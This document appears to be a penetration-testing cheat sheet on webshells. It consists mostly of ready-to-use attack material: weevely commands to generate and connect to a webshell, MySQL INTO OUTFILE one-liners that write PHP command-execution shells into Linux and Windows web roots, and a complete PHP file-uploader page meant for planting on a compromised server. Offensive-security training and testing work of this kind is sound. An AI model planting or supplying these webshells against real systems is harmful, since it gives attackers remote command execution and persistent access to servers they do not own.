# Webshells

## 01 - Weevely

^e8491c

Unlike the regular reverse/bind shells that we use to receive a connection. Webshells functions way differently that it doesn't require port forwarding nor a C2 server when sending commands from the attacker. It only requires a foothold to continue on the cyber intrusion.

- Generate a weevely webshell

`$ weevely generate <password> <path>`

- After succesfully uploading on the target's system we can finally move on to post exploitation phase.

`$ weevely <URL> <password>`

Navigate to the **Command and Control** section related to [[Weevely]].

## 02 - Webshells

### 2.1 - MySQL

```
mysql> SELECT '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';

mysql> SELECT '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE 'C:\\inetpub\\wwwroot\\phpmyadmin\\config\\shell.php';

mysql> SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {​​system($_GET['cmd']);}​​ ?> </pre></BODY></HTML>" INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'
```

### 2.2 - Uploader

`$ cat uploader.php`

---

```php
<html>
    <body>
        <?php
            $path_name = pathinfo($_SERVER['PHP_SELF']);
            $this_script = $path_name['basename'];
        ?>

        <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
            File: <input name="file" type="file" /><br />
        <input type="submit" value="Upload" /></form>

        <?php

            if (!empty($_FILES["file"])) {
                if ($_FILES["file"]["error"] > 0) {
                    echo "Error: " . $_FILES["file"]["error"] . "<br>";
                }
                else {
                    echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"] / 1024)." kB<br/>";
                    move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
                }
            }

            // open this directory
            $myDirectory = opendir(".");
            // get each entry
            while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
            $indexCount = count($dirArray);
            echo "$indexCount files<br/>";
            sort($dirArray);

            echo "<table border=1 cellpadding=5 cellspacing=0 class=whitelinks><tr><th>Filename</th><th>Filetype</th><th>Filesize</th></tr>\n";

            for($index=0; $index < $indexCount; $index++) {
                if (substr("$dirArray[$index]", 0, 1) != ".") {
                    echo "<tr>
                    <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
                    <td>".filetype($dirArray[$index])."</td>
                    <td>".filesize($dirArray[$index])."</td>
                    </tr>";
                }
            }
            echo "</table>";
        ?>
    </body>
</html>
```

### 2.3 - Laudanum

You can navigate to `/usr/share/laudanum` or `/usr/share/webshells` based on what pentest distro you have or you can clone it on github

## References

- [Webshell](https://oscp.infosecsanyam.in/shells/webshell)